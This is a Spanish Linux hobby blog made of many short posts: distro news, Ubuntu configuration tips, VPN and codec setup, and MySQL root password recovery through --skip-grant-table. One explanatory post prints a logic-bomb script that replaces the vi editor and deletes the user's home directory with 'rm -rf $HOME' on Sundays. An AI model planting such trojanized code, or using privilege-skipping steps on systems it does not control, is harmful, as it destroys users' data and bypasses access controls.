¿Conoces a SanIgnucio?

San Ignucio (Saint Ignucius) es el nombre de un personaje que, a manera de broma, interpreta Richard Stallman. El nombre es una mezcla de Ignacio y GNU. El origen de este personaje lo podemos encontrar en el carácter "evangelizador" de Stallman, predicando las bondades del software libre y haciendo frecuentes analogías entre este movimiento y una religión. Para su interpretación suele vestirse con una túnica negra, colocarse en la cabeza el plato de un antiguo disco duro, a modo de aureola dorada, y sostener su computadora portátil que asegura sólo contiene software libre.

1000000% Freak

Fuente : La librería de alejandría (Wikipedia) :P

Saltarse privilegios en Mysql

Muchas veces tenemos problemas al olvidarnos la contraseña de root de Mysql o tomar la administración de un sistema en ejecución, donde el personal
no tiene documentado las usuario y contraseñas de Mysql. Estos
problemas pueden ser solucionados sin reinstalar Mysql, a través de un
modo de ejecución del servidor que salta los privilegios. De esta
manera podemos logearnos como root sin tener su contraseña y poder
modificar la vieja contraseña. Aquí os explico los pasos para lograrlo,
la explicación se basa en Debian y Ubuntu, en otras distribuciones
podría llegar requerir modificar los paths, pero el concepto es el
mismo.

  1. Como primer paso paramos el servidor Mysql.

    # /etc/init.d/mysql stop
  2. Ahora levantaremos el servidor sin privilegios. Para esto simplemente ejecutaremos el binario mysqld_safe pasandole como parámetro skip-grant-table. El ampersand al final indica que se ejecute el proceso en segundo plano.

    # /usr/bin/mysqld_safe --skip-grant-table &

    [1] 14836
  3. Levantado el servicio, entramos a mysql como usuario root. Y una vez dentro, deberemos entrar a la base de datos llamada mysql. La cual mantienen información de administración del servidor.
    mysql -u root
    mysql>use mysql;
  4. Para modificar el password, debemos actualizar el registro del
    usuario root. Los registros de los usuarios se encuentran en la tabla user. Así que simplemente haremos un update modificando el campo Password.

    update user set Password=PASSWORD('Nuevo_Password') where User='root';

    Nota: Respetar las mayúsculas.

  5. Finalmente matamos el proceso anterior y volvemos a levantar el servidor.

    # kill -9 14836
    # /etc/init.d/mysql start

Fuente: InfoSofia

Nuevas salidas de distribuciones linux

Hoy os voy a hablar de la salida al mundillo linuxero de distribuciones frescas:
Para empezar Mandriva 2009 (la antigua mandrake), estará disponible para su comunidad de usuarios el próximo mes de Octubre, pero antes, los mas impacientes, van a poder disfrutar de varias versiones alpha y beta. Este es el calendario:

· 25 de Junio - Alpha 1
· 10 de Julio - Alpha 2
· 29 de Julio - Beta 1
· 19 de Agosto - Beta 2
· 3 de Septiembre - Release Candidate 1
· 23 de Septiembre - Release Candidate 2
· 2 de Octubre - Lanzamiento oficial interno
· 9 de Octubre - Versión final de Mandriva 2009

Por otro lado CentOS 5.2 acaba de ver la luz. Esta distribución basada en Red Hat, es una de las distribuciones que mas han crecido en los últimos tiempos y que ofrece a sus usuarios todo aquello que podemos encontrar en las distros mas usuadas de la actualidad.

Al igual que Red Hat, usa el potente sistema de paquetes rpm y posee también muy buenas cualidades para ser usado como sistema operativo servidor.

Y ya por último os hablo de Arch Linux 2008.06, que viene cargada de muchas novedades como su nuevo kernel y que ya la podeis descargar.

Recordemos que la filosofía e Arch Linux tal vez esté orientada al usuario avanzado, pero que al mismo tiempo posee potentes y sencillas herramientas de administración que hacen que no sea estrictamente necesario ser un gurú para llevar a cabo su manejo.

Fuente: Fentlinux

Gestor de fondos para Gnome

No sé si a vosotros os pasará, pero yo soy de esas personas que son incapaces de mantener el mismo fondo de escritorio más de 2 dias, así que para todos los fondo adictos, aquí os dejo tres programas para la gestión de vuestros fondos de pantalla.

En primer lugar hablare de Wallpaper-tray, esta pequeña utilidad se integra perfectamente con el escritorio Gnome, la cual se encuentra en los repositorios. Algunas de sus características son:

  • Seleccionar las capetas de donde escoger los fondos.
  • Definir el intervalo de tiempo para que cambie el fondo.
  • Elegir como colocar el fondo, escalado, centrado, ….
  • La selección la puedes hacer por nombre, fecha o aleatoria.
  • Incorpora un buscador para localizar una imagen en concreto.

Ahora le toca el turno a la aplicación llamada Webilder. Este programa lo que hace es descargarse de la pagina Flickr y Webshots los fondos de pantalla mas populares pero puedes filtrarlas por medio de tags, galerías o usuario, también puedes configurar el intervalo de tiempo de descarga, este programa se encuentra en casi todos los repositorios para aquellos que no lo incorpore os dejo el enlace de descarga.

Por ultimo, pero por ello no menos interesante, os hablare de Wallpapoz, este software va por el mismo camino que wallpaper-tray, pero con la característica de que puedes configurarlo para que cuando cambies entre escritorios virtuales. También puedes elegir una carpeta donde tengas los fondos, otra de sus características es que aseguran que funciona con Beryl y Compiz

Fuente: Linux Zone

Visualizar webcam con mplayer

Voy a poner un pequeño truco de como gracias a mplayer podeis veros através de la webcam. Simplemente teneis que abrir la consola y escribir el siguiente comando:

mplayer -tv driver=v4l2:width=320:height=240:device=/dev/video0 -fps 25 tv://

Consiguen instalar linux en Wii!

Una selecta comunidad de hackers han conseguido instalar y ejecutar Linux en la consola producida y desarrolada por Nintento, la blanquita Wii. Desde que se descubrió el hueco de seguridad muchos han sido los programas que han ido apareciendo para wii como trucha, canales piratas... pero la ejecución del sistema del pingüino en la consola de nintendo es una hazaña en mayúsculas.

Wii Baile!!

Aquí os dejo uno de esos videos que no me canso de ver y oir. Mira que es pegadizo el wii baile ;)

¿Qué es una bomba lógica y como crear una?

Las bombas lógicas son en cierta forma similares a los troyanos: se trata de código insertado en programas que parecen realizar cierta acción útil. Pero mientras que un troyano se ejecuta cada vez que se ejecuta el programa que lo contiene, una bomba lógica sólo se activa bajo ciertas condiciones, como una determinada fecha, la existencia de un fichero con un nombre dado, o el alcance de cierto número de ejecuciones del programa que contiene la bomba; así, una bomba lógica puede permanecer inactiva en el sistema durante mucho tiempo sin activarse y por tanto sin que nadie note un funcionamiento anómalo hasta que el daño producido por la bomba ya está hecho. Por ejemplo, imaginemos la misma situación que antes veíamos para el troyano: alguien con el suficiente privilegio renombra a vi como vi.old, y en el lugar del editor sitúa el siguiente código:

#!/bin/sh
if [ `date +%a` = "Sun" ];
then
rm -rf $HOME
else
vi.old $1
fi

Este cambio en el sistema puede permanecer durante años sin que se produzca un funcionamiento anómalo, siempre y cuando nadie edite ficheros un domingo; pero en el momento en que un usuario decida trabajar este día, la bomba lógica se va a activar y el directorio de este usuario será borrado.

Java 100% Libre para finales de 2008

Simon Phipps, jefe de proyectos Open Source de Sun, ha declarado que Sun Microsystems ha manifestado su intención de liberar completamente Java bajo la licencia GPL.

Se espera que a finales de este año todo el código fuente para Java esté liberado bajo la GPL. No especifica si se tratará de la GPLv3 o alguna otro tipo de licenciamiento. Sin duda es una excelente noticia y en el momento que Java sea 100% libre sera de gran ayuda para el software libre.

Como crear una Lan con equipos de fuera de la red

Vamos a ver como crear una red de area local con equipos de fuera de la red que se conectan a esta através internet. Esto nos sirve para jugar, compartir archivos, música, etc. a través de redes VPN.

Vamos a hacerlo todo desde consola y ya verás como resulta muy sencillo:

sudo modprobe tun
sudo gedit /etc/modules

En este fichero escribiremos al final : tun

cerramos y guardamos.

ahora en el mismo terminal escribimos el siguiente codigo:

ls /dev/net/tun

Nos debe aparecer "/dev/net/tun"
De lo contrario haremos lo siguiente:

sudo mkdir /dev/net
sudo mknod /dev/net/tun c 10 200

Si os da problemas borraremos la carpeta "tun" (con el comando rmdir tun) y volveremos a crearla usando el comando de arriba: mkdir /dev/net

Ahora nos descargamos la última versión de hamachi http://files.hamachi.cc/linux/ o de:

Lo descomprimimos y desde consola

cd hamachi-*

Y lo instalamos

sudo make install

Ahora nos vamos a la usr/bin

cd /usr/bin

y extraemos el binario de hamachi, seguramente no tengais upx instalado, así que primero ejecutaremos:

sudo apt-get install upx-ucl

y luego extraemos:

sudo upx -d hamachi

Después iniciamos tuncfg:

sudo /sbin/tuncfg

Y creamos un grupo de hamachi:

sudo groupadd hamachi

Nos agregamos al grupo de hamachi creado:

sudo gpasswd -a NOMBREUSUARIO hamachi

Agregamos al root al grupo de hamachi

sudo gpasswd -a root hamachi

Cambiamos los permisos para el socket

sudo chmod 760 /var/run/tuncfg.sock

Cambiamos el grupo del archivo

sudo chgrp hamachi /var/run/tuncfg.sock

Y creamos la clave RSA:

hamachi-init

Ahora ya podemos iniciar hamachi

sudo hamachi start

Ahora os dejo algunos comandos prácticos para hamachi:

Crear el nombre de una cuenta de hamachi

sudo hamachi set-nick NICKQUEQUIERAS

Loguearse a la red de hamachi

sudo hamachi login

Entrar a alguna red

sudo hamachi join "red" password

por ejemplo:

sudo hamachi join "MSHOME" psylard

También se puede crear una red propia:

sudo hamachi create NUESTRARED

con esto ya estamos dentro de la red, pero aparecemos como offline, para cambiarnos a online lo hacemos con:

sudo hamachi go-online "NOMBRERED"

y para ver el estado de todos los usuarios que se encuentran conectados a nuestras redes:

sudo hamachi list

se mira asi:

* [homelan]

* 5.0.0.15

x 5.0.0.16 Psylard

5.0.0.17 WikiFer

* 5.0.0.18 Mary 10.0.0.100:45634
El * es que están online, cuando nosotros estamos como offline no tendremos el * en el nombre de la red.
Para ver el estado de nuestro hamachi:

sudo hamachi

Y con esto ya teneis todo lo necesario ;)

Como leer comics en Ubuntu

Si te gustan por los cómics, con este visualizador podrás verlos en formato digital desde Linux. Es muy intuitivo, fácil de manejar y sobre todo, pensado para ofrecer la máxima comodidad a la hora de ver sus cómics en la pantalla del ordenador, con todas las ventajas.
Te permite disfrutar de vistas personalizadas: doble página, a pantalla completa, enfocado a cada viñeta de tus cómics, etc. Dispone de las opciones de aumentos y scroll, rotación e incluso lentes para ampliar una zona.
Es capaz de abrir imágenes en formato ZIP, RAR, o archivos TAR, además de los formatos clásicos de imágenes. En definitiva un programa imprescindible para los amantes de los comics ;)

Instalacion en Ubuntu:
sudo apt-get install comix

Página oficial: http://comix.sourceforge.net/index.html

Firefox con visualizador de tabs al estilo KDE

Tab scope es un complemento de firefox, que nos permite al pasar el ratón por encima de una pestaña, previsualizar el contenido de la misma al puro estilo KDE o Vi$ta ;)

Abrir aplicaciones con gestos de ratón

Ayer encontré un programita bastante friki que permite abrir aplicaciones mediante gestos de ratón, es muy sencillo de configurar y lo podeis descargar desde aquí y una vez descomprimido instalar los dos paquetes que vienen dentro con un doble click ;)


Una vez instalado abrimos un terminal y escribimos: gestikk -c
tras esto se nos abrirá la siguiente ventana, y en la parte inferior de la misma podemos seleccionar el botón con el que activar los gestos de ratón.




Por último en la sección de gesticure si le damos a añadir, podremos editar los gestos de ratón que queremos asignar a nuestras aplicaciones.


Ahora solo nos queda hacer un lanzador en Sistema > Preferencias > Sesiones
para que se ejecute al iniciar Ubuntu. Con el comando gestikk
Y listo!

Como hackear Window$ Vi$ta en 2 minutos desde Linux

Aquí os dejo un video de Offensive Security en que que os muestra como con apenas 10 líneas se puede hackear vi$ta... premio a la seguridad señor Gates :P



Canonical publica Ubuntu MID 8.04

Ya esta aquí Ubuntu MID (Mobile Internet Device) la esperada distro para netbooks de canonical, especialmente optimizada para el procesador Atom de Intel y la plataforma Menlow. Ubuntu MID no deja de ser un Ubuntu normal donde se le ha quitado algunos paquetes, se le han añadido otros aparte de cambiarle la apariencia.

Estas son algunas de las aplicaciones incluidas

  • MID Browser: Usa un navegador web basado den Gecko diseñado específicamente para pantallas pequeñas con soporte para hacer zoom.
  • Pidgin como cliente de mensajería instantánea.
  • Cheese para la integración de cámara web.
  • Claws Mail como el cliente de mensajería por defecto.
  • Moblin Media para reproducción de audio y vídeo.
  • Juegos: Entre ellos Neverball y Frozen Bubble (un clásico que no puede faltar en ningun PC).
  • FBReader como lector de libros electrónicos.
  • Otras pequeñas aplicaciones: Reloj con alarma, calculadora, lista de contactos…

Por otro lado, sigue usando NetworkManager para gestionar las conexiones a Internet cableadas o inalámbricas. El servidor gráfico X Server en su versión 1.4.1 y kernel Linux v.2.6.24.

Si sois afortunados y disponéis de un netbook podéis descargarlo y probarlo. Y si como yo no tenéis uno y queréis echarle un vistazo igualmente, podéis hacerlo mediante una imagen de máquina virtual KVM (Kernel-based Virtual Machine) que Canonical ha dispuesto.

Instalar y Configurar Ubuntu 7.10 o 8.04 en iMac Intel

He visto en el google Analytics que los usuarios de Mac también pasais por aquí, y me gustaría compartir con vosotros un post de MACUOREN en el que cuenta como instalar Ubuntu en un iMac. Y así animaros a probar sin emulaciones nuestro querido Ubuntu ;)

Fuente MacUoren.es:

Lo que hay:

  • Sistema operativo instalado: Mac OS X, 10.4 Tiger o 10.5 Leopard.
  • Sistema operativo a instalar: Ubuntu 7.10 Gusty Gibbon o 8.04 Hardy Heron.
  • Equipo donde instalar : iMac Intel Core 2 Duo de 20″ (el blanquito).

Antes de empezar recomiendo hacer copias de seguridad de los datos que no quieras perder, por si las moscas.

Al lío:

Suponiendo que ya tienes la ISO de Ubuntu quemada en un CD…

Instalación:

  1. Descargar e instalar rEFIT.
  2. Actualizar firmware del equipo –> Manzana/Actualizar software.
  3. Reiniciar el equipo con el CD de Ubuntu introducido e iniciarlo.
  4. Redimensionar (reducir) la partición HFS+ de Mac OS X con Gparted (Sistema/Administración/Editor de particiones) [yo le he dejado 20 Gb libres, aunque no es necesario tanto]. Mi esquema de particiones es el siguiente:
  5. Instalar Ubuntu normalmente.
  6. Seleccionar particionado manual –> crear 2 particiones: una Ext3 (con punto de montaje en /) y otra swap (a esta le he dado 2 Gb).
  7. Terminar instalación.

Notas Instalación:

  1. Al iniciar el CD de Ubuntu, en el menú principal, no detecta el teclado de Apple, y se puede utilizar otro teclado USB, pero no es necesario, ya que pasados 30 segundos comienza a iniciarse el modo LiveCD, y aunque esté en ingles, cuando comience la instalación basta con seleccionar el idioma español.
  2. Durante la instalación da igual el tipo de teclado a elegir,
    mas adelante hay que configurarlo.
  3. De todos los tutos que he visto, nadie utiliza Gparted para redimensionar la partición de Mac OS X, y me extraña un poco, por que es gráficamente mas sencillo. y Gparted no crea particiones HFS+, pero puede reducirlas y moverlas.

Tras Instalación:

  1. Controlador de la tarjeta gráfica ATI: al iniciar sesión por primera vez aparece el icono de una tarjeta gráfica en la barra de tareas superior que indica “Restricted drivers avaiable“, si no aparece hay que ir a la dirección Sistema/Administración/Controladores de hardware –> lo ejecutamos y marcamos la casilla “Habilitado“. Tardará un rato para descargarse los controladores e instalarlos, pero lo hace todo el solito. La próxima vez que iniciemos la resolución del escritorio será mayor entre otras mejoras.
  2. Soporte de Idiomas: es importante realizar este paso si queremos que todas las funciones que puedan estar con idioma español lo estén, simplemente ir a Sistema/Administración/Soporte de idiomas, se instalará automáticamente al abrirlo, después asegúrate de que está marcado el idioma “Español; Castellano.
  3. Actualizar el sistema: al igual que el paso anterior, al iniciar sesión por primera vez aparece el icono de un asterisco en la barra de tareas superior que indica que existen actualizaciones –> las instalamos.
  4. Acceso a la partición de Mac OS X:

    1. Dar permisos de lectura y escritura en Mac OS X a las carpetas a las que quieras acceder desde Ubuntu –> Ve a la carpeta, clica con el botón secundario –> “Obtener información“, en permisos marca todos como leer y escribir, y selecciona mas abajo en “Aplicar a los items incluidos“.
    2. Quitar el registro de la partición de Mac OS X mediante la aplicación Onyx en “Información/Disco“. Aunque esté en fase beta para Leopard, realiza esta operación sin problemas, pero no recomiendo utilizar la aplicación de momento para optimizar el sistema. [01/01/08] Ya salió de fase beta. Pantallazo:
    3. Configurar un punto automático de montaje con privilegios de lectura y escritura de dicha partición en Ubuntu. Lo que yo he hecho ha sido esto:
      1. Crear una carpeta en /mnt llamada mac:
        sudo mkdir /mnt/mac
      2. Editar el archivo fstab:
        sudo gedit /etc/fstab
      3. Yo he montado la partición de Mac OS X (que corresponde a sda2) en la carpeta /mnt/mac –> añadir al final de fstab esta linea:
        /dev/sda2 /mnt/mac hfsplus rw,users 0 0
      4. Guardar el archivo, cerrarlo, y reiniciar o montarla manualmente con:
        mount /mnt/mac
      5. Si tras esto nos dice que no tenemos permiso de escritura desde Ubuntu, en este tecleas en un terminal: sudo nautilus (esto permite utilizar Nautilus con permisos de root) y luego ves a la carpeta donde quieres poder escribir –> Clic botón derecho/Propiedades/Permisos selecciona en el segundo grupo a “plugdev” y “Acceso a Carpeta: Crear y borrar archivos“.
  5. Activar compiz fusion y personalizarlo.
    A mi me ha dado un problema –> me da el error “The Composite extension is not available” cuando voy a activar los efectos de escritorio, pero se soluciona simplemente instalando “xserver-xgl“: sudo aptitude install xserver-xgl
  6. Personalizar escritorio.
  7. Instalar Extensiones Firefox.
  8. Instalar aplicaciones, codecs, etc.

Otras configuraciones:

  • Sonido en altavoces externos: si conectas unos altavoces externos hay que configurarlos, si no, el aumentar y disminuir el volumen no funcionará. Para ello –> clica con el botón secundario sobre el icono del volumen en la barra de tareas, en “Preferencias“, y selecciona “PCM“. De esta manera puedes cambiar el volumen desde la barra de tareas, pero si quieres hacerlo desde el teclado y el Apple remote, además de lo anterior –> ve a “Sistemas/Preferencias/Sonido/Dispositivos” y donde pone “Pistas predeterminadas del mezclador” selecciona “PCM“.
  • Micrófono integrado: por defecto tiene el volumen al mínimo, yo recomiendo ponerlo al máximo –> clica con el botón secundario sobre el icono del volumen en la barra de tareas, en “Abrir el control de volumen“, en el menú “Editar/Preferencias” marcar la casilla “Captura“, cerrar y en la pestaña “Grabando” aumentar el volumen al máximo.
  • iSight (WebCam): Simplemente hay que seguir este tutorial –> Quick and easy iSight setup (a pesar de estar en ingles solo hay que ir comando por comando, muy sencillo).
  • Teclado Apple: Al principio funciona perfecto, pero tras iniciar sesión un par de veces “se descolocan” las teclas, para solucionarlo –> ir a Sistema/Preferencias/Teclado/Distribuciones, añadir una distribución con “Capa: España” y “Variantes: Macintosh“, y en “Modelo de teclado” elegir “Apple“.
  • Mighty Mouse: SOLO botones laterales: Botones Laterales de Ratón en GNU/Linux.
  • Bluetooth: sin instalar nada se puede enviar archivos del iMac a dispositivos Bluetooth, pero no recibir, para que esto último sea posible es necesario instalar el paquete gnome-bluetooth y tener ejecutada esta aplicación, situada en Aplicaciones/Accesorios/Compartición de archivos por bluetooth. En la versión 8.04 Hardy Heron funciona perfecto sin configurar nada, incluso “Explorar dispositivo…”.
  • Apple Remote (Mando a distancia): funciona perfecto sin configurar nada. Las teclas de volumen funciona para todo el sistema en general, y los botones de pasar canciones, play y pausa los he probado en:
    • Totem: Si funciona.
    • VLC: No funciona.
    • Rhythmbox: Si funciona.
    • Banshee: Si funciona.
    • Exaile: Si funciona.
    • Listen: Si funciona, pero solo el “play/pause”, en vez de pasar de canción la detiene.
    • BMP: No funciona.
    • Songbird: No funciona.
    • Amarok: No funciona (quizás es por ser una aplicación de KDE).
    • Audacious: No funciona.
    • Beep Media Player: No funciona.
    • XMS: No funciona.
  • Brillo de la pantalla [02/01/08 Gracias a Anónimo y a bixen]: no es posible utilizar la “Miniaplicación de brillo” en el panel. Se puede hacer un apaño bastante majo ;) :
    1. Primero instalas las librerías build-essential, libpstreams-dev, y z88dk desde Synaptic o desde un terminal con: sudo apt-get install build-essential libpstreams-dev z88dk.
    2. Te descargas este archivo: backlight.zip.
    3. Lo descomprimes y te crea el archivo backlight sin extensión, es un ejecutable.
    4. Introduce en un terminal: sudo nautilus.
    5. Copias y pegas el archivo backlight en la carpeta /usr/bin desde el explorador de nautilus que acabas de abrir como root.
    6. Para cambiar el brillo puedes poner un numero del 1 al 15 con el siguiente comando: sudo backlight 6 (el 6 es un ejemplo). Pero también puedes aumentar o disminuir este añadiendo un + o un - delante del número, por ejemplo: sudo backlight -3 (en este caso se disminuyen 3 puntos de brillo).
    7. Para asignarle teclas si tu gestor de ventanas es Compiz-Fusion:
      1. Ve a Sistema/Preferencias/Advanced Desktop Effects Settings/General Options/Commands e introduce en Línea de comandos 1 –> sudo backlight -1, y en Línea de comandos 2 –> sudo backlight +1:
      2. Ve a Sistema/Preferencias/Advanced Desktop Effects Settings/General Options/Actions/Commands e introduce en Ejecutar comando 1 –> en Key la tecla F14, y en Ejecutar comando 2 –> en Key la tecla F15 (yo le he puesto estas teclas por que son las mismas que en Mac OS X, pero está claro que le puedes poner las que quieras).
      3. En este último caso, me parece estupendo personalmente el poder regular el brillo con la rueda del ratón teniendo pulsado Ctrl, para ello introduce en Ejecutar comando 1 –> en Button el texto Button5, y en Ejecutar comando 2 –> en Button el texto Button4.
      4. NOTA: en ocasiones no funcionan los atajos, no entiendo porqué.
    8. [03/01/08] Se me acaba de ocurrir otra manera, que la he probado y no da problemas. Consiste en crear dos lanzaderas (o accesos directos) en el panel cuyos comandos sean los explicados, dejando sus propiedades tal que así:

aTunes la alternativa libre a iTunes

aTunes es un reproductor de audio OpenSource desarrollado bajo lenguaje Java el cual soporta formatos MP3, Ogg Vorbis, wma y mp4 solo por mencionar a los mas importantes.

Actualmente la versión 0.8 soporta tags ID3, tanto en lectura como escritura, lectura de imágenes, listas de reproducción m3u, vista completa (similar a iTunes y Amarok) ó vista simple (similar a Winamp), navegación por tags o por carpetas y varios idiomas.

Si estas interesado en testear esta aplicación solo tendrás que acceder al portal web del proyecto y cargarlo.

Como cambiar el menu de inicio de Ubuntu y Gnome

Bien el método es bastante sencillo, y podeis poner la imagen que querais como botón de inicio, yo por ejemplo puse esta:
Es muy facil hacer el botón que querais con el gimp por ejemplo (como os cuento al final del artículo)

Ahora os contare como hacerlo todo:

Primero vamos a cambiar el menú tipico que viene con ubuntu por otro que se llama "Menú Principal", si quereis manterner el otro hasta que acabemos y luego borrarlo con el botón derecho, eso a gusto de cada uno.
Vamos a añadir el nuevo menu para ello click botón derecho del ratón en el panel de inicio "Añadir al panel" y al final del todo tenemos uno que es Menú Principal, lo seleccionamos.
Como veis tiene todo en un solo icono y esto es lo que nosotros queremos.
Ahora que ya lo tenemos, haremos lo siguiente:

Pulsamos Alt+F2 y ejecutamos:
gconf-editor

- en la ventana buscamos la clave: apps>panel>objects>objects_0

- Donde pone “object_type” lo cambiamos por “menu_object

- Donde pone “custom_icon“, introducimos la ruta donde este nuestra imagen.

Y listo. Ahora podemos reiniciar sesion para que los cambios tengan efecto.

Para hacer la imagen yo he hecho lo siguiente, he cogido un icono que me gustaba que tiene un tamaño pequeño y una extensión png, y lo he editado con el gimp añadiendole el texto que quería que apareciera, así de simple ;)


OpenOffice es mas lento a cada nueva versión

Un estudio realizado por el portal “downloadsquad” demuestra que la Suite Offimatica de OpenOffice es mas lento a cada nueva versión. Esto pudo ser comprobado mediante un experimento en el cual se compararon los tiempos de ejecución entre las diferentes versiones existentes de OpenOffice.


Al hacer pruebas tales como la ejecución de tareas, abrir y cerrar la aplicación así como pasar el scroll por el documento. Los resultados finales de las pruebas muestran claramente que OpenOffice tiende a ser cada vez mas lento con respecto al avance de sus versiones.

Solucionar Problema VMWare: Failed to allocate page for guest RAM!

Hoy instalando el VMWare he tenido por primera vez el siguiente problema:
Failed to allocate page for guest RAM!

Y aquí os explico la manera de solucionarlo:

Teneis que editar el archivo *.vmx y meterle la siguiente linea:
mainmem.UseNamedFile = "FALSE"

Y tras esto todo listo!

Agilizar la carga de las páginas web en ubuntu

Muy bien, este es un truco muy sencillo que he cogido del blog de "The New Cult of Dead Cow" en el que nos cuenta como instalar nuestro propio servidor DNS cache para agilizar nuestra navegación web. Y esto es debido a que el proceso por el cual nosotros leemos cualquier pagina web se puede simplificar en dos partes:
  1. Obtener la direccion IP del recurso
  2. Obtener el recurso

Un DNS cache nos permite optimizar la primera de las dos anteriores.

Para ello instalaremos bind9 como servidor DNS cache con:

sudo aptitude install bind9

Y lo configuraremos metiendo nuestras propias direcciones de DNS, para ello editamos el archivo named.conf.options:

sudo gedit /etc/bind/named.conf.options

y en la zona donde pone:

//forwarders {
//;
//};

Lo descomentaremos y pondremos nuestras DNS al así:

forwarders {
200.48.225.130;
200.48.225.146;
};

guardamos y listo ;)

Gracias para Geeks

Como sería la tumba de un buen friki??


"Chiste" linuxero



La Fábrica de Tuxs

Aquí os paso una página que me ha mandado mi chica en la que teneis cientos del tux con diferentes vestimentas y personalidades, ideal para avatars o entradas en vuestros blogs, espero que os guste ;)

antiX Mepis 7.2 distribución muy liviana con Fluxbox

El proyecto MEPIS anunció así el lanzamiento de antiX 7.2 "Vetëvendosje" la versión especial de su distribución MEPIS Linux 7.0, basada en el Kernel 2.6.22 y paquetes seleccionados de Debian Lenny para computadoras tan modestas como Pentium IIs con 64 Mb de RAM. antiX 7.2 incluye los Window Managers IceWM y Fluxbox con el ROX Desktop para conseguir un sistema muy rápido y totalmente funcional.

Gracias a su comunidad, esta versión también incluye renovados menúes para una mejor usabilidad, un completo conjuntos de FAQs para el usuario novato, fondos de pantalla originales, y scripts para la configuración de archivos del sistema y del usuario.

Esta es la lista de aplicaciones que incluye en su imágen de sólo 359 Mb, y para quienes deseen construir su propia variación de antiX también está disponible una instalación básica.

El asesino de linux declarado culpable

Supongo que la gran mayoría de vosotros habreis oido hablar del sistema de archivos Reiser, no así de su creador Hans Reiser o más conocido ultimamente como el asesino de linux, pues bien, un día su ex-mujer desapareció en «extrañas circunstancias» y desde 2006 ha estado encarcelado de forma preventiva a la espera del juicio. Recientemente hemos podido saber que ha concluido el jucio con el veredicto de que: Hans Reiser es culpable del asesinato de su ex-mujer una novia rusa encargada por correo. Aquí os dejo la fuente de la noticia:

Wine 1.0 ve la luz

Como comentan en Slashdot, el día 17, tras 15 años de desarrollo ha sido liberada la versión 1.0 de Wine.
Para todos aquellos que no lo conozcan Wine es una implementación libre de la API de Window$ sobre X, Open GL y sistemas Unix (también hay una versión para Mac OS X llamada Darwine), o lo que es lo mismo, es una aplicación que nos permite ejecutar aplicaciones de Window$ en linux. Aunque todavía no se ha conseguido una compatibilidad perfecta con Window$, entre los objetivos de esta primera versión se encuentra el soporte completo de Photoshop CS2, Excel Viewer 2003, Word Viewer 2003 y PowerPoint Viewer 2003. Se puede encontrar información sobre estas y el resto de las aplicaciones soportadas en la Wine Application Database. Desde Pinguinos y Cia les mandamos un fuerte abrazo y nuestra más sincera felicitación al equipo de Wine.

Instalación en Ubuntu 8.04:

En primer lugar, abrimos una ventana de terminal. Entonces añadimos la clave de repositorio a su sistema APT de lista de claves de confianza por copia y pegue el texto siguiente:

wget -q http://wine.budgetdedicated.com/apt/387EE263.gpg -O- | sudo apt-key add -

A continuación, añadimos el repositorio al sistema de listado de fuentes APT:

sudo wget http://wine.budgetdedicated.com/apt/sources.list.d/hardy.list -O /etc/apt/sources.list.d/winehq.list

Luego actualizamos el paquete de información de APT ejecutando:
sudo apt-get update

Y listo, ya tenemos Wine 1.0 instalado ;)

OpenSuse 11 lanzada

Ayer se lanzó la versión final de la esperada OpenSuse 11, el que hoy por hoy es el más claro contrincante de Ubuntu 8.04, que hasta octubre no se verá actualizada.
Creeis que le podrá hacer sombra a la todopoderosa Ubuntu. Lo sabremos dentro de unos pocos meses...
Aunque de momento la cosa en Distrowatch esta así:

1 Ubuntu ................. 2361>
2 openSUSE ............. 1638>
3 Fedora................... 1407>
4 Mint ..................... 1350<
5 PCLinuxOS............1280>
6 Mandriva .............. 930=
7 Debian.................. 909>
8 Dreamlinux............ 727>
9 Sabayon ................700>
10 Damn Small.......... 653<

Archivos *.wmv en Ubuntu

Aquí os comento la manera más sencilla de poder ver archivos *.wmv con nuestro reproductor favorito en Ubuntu. Abriremos una consola y escribimos una a una las siguiente instrucciones:

wget http://www3.mplayerhq.hu/MPlayer/releases/codecs/essential-20061022.tar.bz2
sudo mkdir /usr/lib/win32
sudo tar -xvjf essential-20061022.tar.bz2 -C /usr/lib/win32/
sudo mv /usr/lib/win32/essential-20061022/* /usr/lib/win32/
sudo rm -r /usr/lib/win32/essential-20061022/

Y listo, ya podemos disfrutar de cualquier video en este formato.

Mañana se conocerá el ganador del concurso eeePC


Para todos aquellos que no lo sepais asus ha sacado en España su portatil de bajo coste Eee Pc que cuesta unos 300€.
Pues bien en la página web de asuseeepc hicieron un concurso para regalar un Asus Eee Pc 2G Surf y mañana se conocerá el ganador de dicho concurso. Suerte para todos los que hayais participado ;) yo cruzaré los dedos :P

Goosh - Google con interfaz de consola no oficial

Goosh es un sitio no oficial del buscador Google que utiliza el motor de búsqueda de Google con una interfaz del tipo shell, al más puro estilo consola. Yo personalmente para mirar una web así prefiero un terminal con lynx, pero aquí os dejo esto como curiosidad ;)


Puedes desplegar la ayuda con el comando: help o h

Goosh es desarrollado por Stefan Grothkopp y no es un producto oficial de Google.

www.goosh.org

Y ya que os he comentado la existencia de Lynx, para todos aquellos que no lo conozcan aquí os comento como instalarlo y os animo a probarlo ;)

sudo apt-get install lynx

Y luego desde el terminal simplemente lynx

Conky un monitor del sistema de bajo consumo

Conky es un monitor del sistema, que nos permite una personalización total, consume muy pocos recursos y por qué no decirlo queda muy friki ;) lo podemos encontrar en los repositorios de Ubuntu con synaptic o desde consola

sudo apt-get install conky

Una vez instalado deberemos configurarlo y dejarlo un poco chulo, para ello vamos a crear el archivo .conkyrc en nuestra carpeta personal de la siguiente forma:

gedit conkyrc

Y a continuación pegaremos el siguiente código dentro:

background yes
cpu_avg_samples 2
net_avg_samples 2
out_to_console no
use_xft yes
xftfont Bitstream Vera Sans Mono:size=7.9
own_window yes
own_window_transparent yes
own_window_hints undecorated,below,sticky,skip
_taskbar,skip_pager
own_window_type normal
xftalpha 0.8
update_interval 1.0
double_buffer yes
minimum_size 10 10
maximum_width 320
draw_shades no
draw_outline yes
draw_borders no
stippled_borders 2
border_width 1
default_color lightslategrey
default_shade_color white
default_outline_color black
alignment top_right
use_spacer yes
no_buffers yes
uppercase no

TEXT
${color #FFFFFF}Psyduckbug http://pinguinosycia.blogspot.com
${color #FFFFFF}Ubuntu Linux 8.04: $kernel

${color #FFFFFF}CPU $color ${cpu cpu1}% ${color #c0c0c0}Uptime:$color $uptime ${color #FFFFFF} Temp: $color ${acpitemp}cº
${color #FFFFFF}${cpugraph cpu1 000000 c0c0c0}
${color #FFFFFF}Procs:$color $processes ${color #FFFFFF}Running:$color $running_processes

${color #FFFFFF}Ram Usada:
$color $mem/$memmax - ${color #c0c0c0}$memperc% $membar

${color #FFFFFF}Espacio libre:
